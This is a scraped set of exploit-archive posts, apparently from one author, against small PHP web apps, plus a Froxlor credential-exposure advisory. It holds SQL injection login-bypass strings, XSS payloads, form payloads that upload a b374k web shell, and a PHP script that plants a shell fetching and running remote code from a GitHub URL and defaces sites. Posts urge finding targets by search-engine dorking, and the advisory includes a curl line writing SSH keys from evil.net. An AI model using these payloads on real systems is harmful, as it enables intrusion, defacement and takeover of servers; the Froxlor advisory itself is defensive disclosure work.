Loan Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Loan Management System 1.0 Auth By Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] USe Payload : User&Pass = ' or 0=0 ##[+] http://127.0.0.1/loan/index.php?page=homeGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Loan Management System 1.0 SQL Injection

Jobs Finder System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Jobs Finder System v1.0 XSS injection Vulnerability                                                                         || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://download-media.code-projects.org/2020/04/Jobs_Finder_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /job.php?id=5'%22()%26%25<acx><ScRiPt%20>prompt(966215)</ScRiPt>[+] http://127.0.0.1/jobportal-master/job.php?id=5'%22()%26%25<acx><ScRiPt%20>prompt(966215)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Jobs Finder System 1.0 Cross Site Scripting

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

**Human Resource Management System 2024 1.0 Cross Site Scripting**

Posted Aug 26, 2024

Authored by indoushka

Human Resource Management System version 2024 version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 25f4d7b7ca25178696d74bb308a9abcdd65caa3fc6c471e46b4b16febaa084ea

Download | Favorite | View

**Human Resource Management System 2024 1.0 Cross Site Scripting**

    =============================================================================================================================================| # Title     : Human Resource Management System 2024 v1.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload :index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>[+] http://127.0.0.1/hrm/index.php?msg=Username%2520and%2520Password%2520is%2520Wrong!'"()%26%25<acx><ScRiPt >prompt(926738)</ScRiPt>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,543)
*   Arbitrary (16,904)
*   BBS (2,859)
*   Bypass (1,875)
*   CGI (1,034)
*   Code Execution (7,834)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,412)
*   DoS (25,116)
*   Encryption (2,389)
*   Exploit (53,289)
*   File Inclusion (4,263)
*   File Upload (1,000)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,239)
*   Local (14,807)
*   Magazine (587)
*   Overflow (13,177)
*   Perl (1,435)
*   PHP (5,226)
*   Proof of Concept (2,394)
*   Protocol (3,731)
*   Python (1,646)
*   Remote (31,695)
*   Root (3,639)
*   Rootkit (528)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,031)
*   Shell (3,281)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,279)
*   SQL Injection (16,625)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,016)
*   Web (9,973)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,267)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,109)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,895)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,615)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,780)
*   UNIX (9,441)
*   UnixWare (187)
*   Windows (6,676)
*   Other

Human Resource Management System 2024 1.0 Cross Site Scripting

Employee Record Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : ERMS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/employee-record-management-system-in-php-and-mysql/                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = ' or 0=0 ## & pass = ' or 0=0 ##[+] http://127.0.0.1/erms/admin/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Employee Record Management System 1.0 SQL Injection

DETS Project version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : DETS Project 1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/daily-expense-tracker-using-php-and-mysql/                                                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user = 'or''='@gmail.com & pass = 'or''='[+] http://127.0.0.1/dets/add-expense.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

DETS Project 1.0 SQL Injection

Bang Resto version 1.0 suffers from an information disclosure vulnerability.

====================================================================================================================================  
| # Title     : Bang Resto 1.0 HTML Form in redirect page Vulnerability                                                            |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                   |  
| # Vendor    : https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip                                                |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Vulnerability description :

An HTML form was found in the response body of this page. However, the current page redirects the visitor to another page by returning an HTTP status code of 301/302.  
 Therefore, all browser users will not see the contents of this page and will not be able to interact with the HTML form. 

Sometimes programmers don't properly terminate the script after redirecting the user to another page. For example:   
<?php  
    if (!isset($_SESSION["authenticated"])) {  
        header("Location: auth.php");  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    
This script is incorrect because the script is not terminated after the "header("Location: auth.php");" line. An attacker can access the content the administration page by using an HTTP client that doesn't follow redirection (like HTTP Editor). This creates an authentication bypass vulnerability.   
The correct code would be 

<?php  
    if (!isset($_SESSION[auth])) {  
        header("Location: auth.php");  
        exit();  
    }  
?>  
<title>Administration page</title>  
<form action="/admin/action" method="post">  
      
</form>

    

[+] infected item : /pass. 

[+] Attack details :

Form action=''

GET /pass/ HTTP/1.1  
Pragma: no-cache  
Cache-Control: no-cache  
Referer: https://127.0.0.1/Bang/admin  
Acunetix-Aspect: enabled  
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c  
Acunetix-Aspect-Queries: filelist;aspectalerts  
Cookie: PHPSESSID=dc1a2974e1afffa5b1926d0e4f3ff57f  
Host: elearning7.smpn49-jkt.sch.id  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21  
Accept: */*

Response  
HTTP/1.1 302 Found  
Connection: Keep-Alive  
Keep-Alive: timeout=5, max=100  
x-powered-by: PHP/7.3.33  
location: https://127.0.0.1/Bang/admin  
content-type: text/html; charset=UTF-8  
content-length: 16992  
vary: Accept-Encoding,User-Agent  
date: Fri, 19 Jul 2024 10:09:49 GMT  
server: LiteSpeed  
cache-control: no-cache, no-store, must-revalidate, max-age=0  
platform: hostinger  
strict-transport-security: max-age=31536000; includeSubDomains; preload  
x-xss-protection: 1; mode=block  
x-content-type-options: nosniff  
Original-Content-Encoding: gzip

[+] The impact of this vulnerability : depends on the affected web application.

[+] How to fix this vulnerability : Make sure the script is terminated after redirecting the user to another page

Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================

Bang Resto 1.0 Information Disclosure

School Log Management System version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : School Log Management System 1.0 WYSIWYG Settings Management Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/slms/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

School Log Management System 1.0 SQL Injection / Code Execution

Simple College Website version 1.0 appears to suffers from a remote SQL injection vulnerability that allows an attacker to achieve code execution.

=============================================================================================================================================| # Title     : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability                                                        || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Part 01 : about-us.php[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .    [+] Line 109 : Send the form data using fetch API (Set your target url)[+] save payload as poc.html[+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Settings Management</title>        <link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">        <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">    <style>        /* Custom Styles */        #cimg {            max-width: 100%;            height: auto;        }        #preloader2 {            position: fixed;            top: 0;            left: 0;            width: 100%;            height: 100%;            background: rgba(0, 0, 0, 0.5);            display: flex;            justify-content: center;            align-items: center;            z-index: 9999;        }        .form-group {            margin-bottom: 1rem;        }        .form-group label {            display: block;            margin-bottom: .5rem;        }        .form-group input, .form-group textarea {            width: 100%;            padding: .5rem;            box-sizing: border-box;        }    </style></head><body>    <div class="container">        <form id="manage-settings" method="post" enctype="multipart/form-data">            <div class="form-group">                <label for="name"> Name</label>                <input type="text" id="name" name="name" required>            </div>            <div class="form-group">                <label for="email">Email</label>                <input type="email" id="email" name="email" required>            </div>            <div class="form-group">                <label for="contact">Contact</label>                <input type="tel" id="contact" name="contact" required>            <div class="form-group">                <label for="about">About Content</label>                <textarea class="text-jqte" id="about" name="about_us"></textarea>            </div>            <div class="form-group">                <label for="img">Cover Image</label>                <input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">                <img id="cimg" src="" alt="Selected Image Preview">            </div>            <button type="submit" class="btn btn-primary">Save Settings</button>        </form>    </div>      <div class="modal fade" id="viewer_modal" role='dialog'>        <div class="modal-dialog modal-md" role="document">            <div class="modal-content">                <button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>                <img src="" alt="">            </div>        </div>    </div>        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>        <script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>    <script>        function displayImg(input, _this) {            if (input.files && input.files[0]) {                var reader = new FileReader();                reader.onload = function (e) {                    $('#cimg').attr('src', e.target.result);                }                reader.readAsDataURL(input.files[0]);            }        }        $(document).ready(function () {            const editorInstance = new FroalaEditor('.text-jqte');        });        $('#manage-settings').submit(function (e) {            e.preventDefault();            start_load();            $.ajax({                url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',                data: new FormData($(this)[0]),                cache: false,                contentType: false,                processData: false,                method: 'POST',                type: 'POST',                error: err => {                    console.log(err);                },                success: function (resp) {                    if (resp == 1) {                        alert_toast('Data successfully saved.', 'success');                        setTimeout(function () {                            location.reload();                        }, 1000);                    }                }            });        });        window.start_load = function () {            $('body').prepend('<div id="preloader2"></div>');        }        window.end_load = function () {            $('#preloader2').fadeOut('fast', function () {                $(this).remove();            });        }        window.viewer_modal = function ($src = '') {            start_load();            var t = $src.split('.');            t = t[1];            if (t == 'mp4') {                var view = $("<video src='" + $src + "' controls autoplay></video>");            } else {                var view = $("<img src='" + $src + "' />");            }            $('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();            $('#viewer_modal .modal-content').append(view);            $('#viewer_modal').modal({                show: true,                backdrop: 'static',                keyboard: false,                focus: true            });            end_load();        }        window.uni_modal = function ($title = '', $url = '', $size = "") {            start_load();            $.ajax({                url: $url,                error: err => {                    console.log(err);                    alert("An error occurred");                },                success: function (resp) {                    if (resp) {                        $('#uni_modal .modal-title').html($title);                        $('#uni_modal .modal-body').html(resp);                        if ($size != '') {                            $('#uni_modal .modal-dialog').addClass($size);                        } else {                            $('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");                        }                        $('#uni_modal').modal({                            show: true,                            backdrop: 'static',                            keyboard: false,                            focus: true                        });                        end_load();                    }                }            });        }        window._conf = function ($msg = '', $func = '', $params = []) {            $('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");            $('#confirm_modal .modal-body').html($msg);            $('#confirm_modal').modal('show');        }        window.alert_toast = function ($msg = 'TEST', $bg = 'success') {            $('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');            if ($bg == 'success')                $('#alert_toast').addClass('bg-success');            if ($bg == 'danger')                $('#alert_toast').addClass('bg-danger');            if ($bg == 'info')                $('#alert_toast').addClass('bg-info');            if ($bg == 'warning')                $('#alert_toast').addClass('bg-warning');            $('#alert_toast .toast-body').html($msg);            $('#alert_toast').toast({ delay: 3000 }).toast('show');        }    </script></body></html>[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Simple College Website 1.0 SQL Injection / Code Execution

### Summary
In Froxlor 2.1.9 and in the HEADs of the `main`, `v2.2` and `v2.1` branches , the XML templates in `lib/configfiles/` set `chmod 644` for `/etc/pure-ftpd/db/mysql.conf`, although that file contains `<SQL_UNPRIVILEGED_PASSWORD>`. At least on Debian 12, all parent directories of `/etc/pure-ftpd/db/mysql.conf` are world readable by default, thus exposing these credentials to all users with access to the system. Only Froxlor instances configured to use pure-ftpd are affected/vulnerable.

### Details
https://github.com/froxlor/Froxlor/blob/2.1.9/lib/configfiles/bookworm.xml#L3075

### PoC
As non-privileged user:
```
nobody@mail:/tmp$ grep MYSQLPassword /etc/pure-ftpd/db/mysql.conf
MYSQLPassword   MySecretMySQLPasswordForFroxlor
```


### Impact
Any unprivileged user with "command/code execution" access to the system can trivially obtain the credentials granting access to the `froxlor` MySQL database. This holds true even for virtual users without SSH access as long as they are able to upload their own PHP scripts or other CGIs, and works even if the admin has setup a separate php-fpm pool that runs as their own user.

Side note: This access to the database can be leveraged to obtain Froxlor admin privileges, and subsequently root privileges. For example:
1. Use the database credentials to extract or change a Froxlor admin's password hash and TOTP seed value.
2. Log into Froxlor as that admin.
3. Set the `Cron-daemon reload command` in `/admin_settings.php?page=overview&part=crond` to something like `curl -o /root/.ssh/authorized_keys evil.net`.
4. Wait a few minutes until the relevant cronjob runs, then log in via SSH.


Please consider using passwordless unix socket authentication. Current versions of MySQL, MariaDB and Percona allow completely removing/omitting database passwords for database connections going through a unix socket, this works even for use cases where the database user has a different name than the system account running the database client:
https://dev.mysql.com/doc/refman/5.7/en/socket-pluggable-authentication.html

**Summary**

In Froxlor 2.1.9 and in the HEADs of the main, v2.2 and v2.1 branches , the XML templates in lib/configfiles/ set chmod 644 for /etc/pure-ftpd/db/mysql.conf, although that file contains <SQL_UNPRIVILEGED_PASSWORD>. At least on Debian 12, all parent directories of /etc/pure-ftpd/db/mysql.conf are world readable by default, thus exposing these credentials to all users with access to the system. Only Froxlor instances configured to use pure-ftpd are affected/vulnerable.

**Details**

https://github.com/froxlor/Froxlor/blob/2.1.9/lib/configfiles/bookworm.xml#L3075

**PoC**

As non-privileged user:

    nobody@mail:/tmp$ grep MYSQLPassword /etc/pure-ftpd/db/mysql.conf
    MYSQLPassword   MySecretMySQLPasswordForFroxlor
    

**Impact**

Any unprivileged user with "command/code execution" access to the system can trivially obtain the credentials granting access to the froxlor MySQL database. This holds true even for virtual users without SSH access as long as they are able to upload their own PHP scripts or other CGIs, and works even if the admin has setup a separate php-fpm pool that runs as their own user.

Side note: This access to the database can be leveraged to obtain Froxlor admin privileges, and subsequently root privileges. For example:

1.  Use the database credentials to extract or change a Froxlor admin's password hash and TOTP seed value.
2.  Log into Froxlor as that admin.
3.  Set the Cron-daemon reload command in /admin_settings.php?page=overview&part=crond to something like curl -o /root/.ssh/authorized_keys evil.net.
4.  Wait a few minutes until the relevant cronjob runs, then log in via SSH.

Please consider using passwordless unix socket authentication. Current versions of MySQL, MariaDB and Percona allow completely removing/omitting database passwords for database connections going through a unix socket, this works even for use cases where the database user has a different name than the system account running the database client:  
https://dev.mysql.com/doc/refman/5.7/en/socket-pluggable-authentication.html

**References**

*   GHSA-34qg-65m4-f23m
*   froxlor/Froxlor@5d2ce4e
*   https://github.com/froxlor/Froxlor/blob/2.1.9/lib/configfiles/bookworm.xml#L3075

GHSA-34qg-65m4-f23m: Froxlor: /etc/pure-ftpd/db/mysql.conf is chmod 644 but contains <SQL_UNPRIVILEGED_PASSWORD>

Crime Complaints Reporting Management System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Crime Complaints Reporting Management System 1.0 code injection Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php target.com[+] payload :<?phpfunction file_upload($website) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(      'action' => '',        'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',        'contact' => '00213771818860',        'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'about' => 'Hacked By Indoushka',        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "$website/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: $website/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <website URL>\n";    echo "(+) Example: php " . $argv[0] . " http://example.com\n";    exit(-1);}$website = $argv[1];file_upload($website);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#php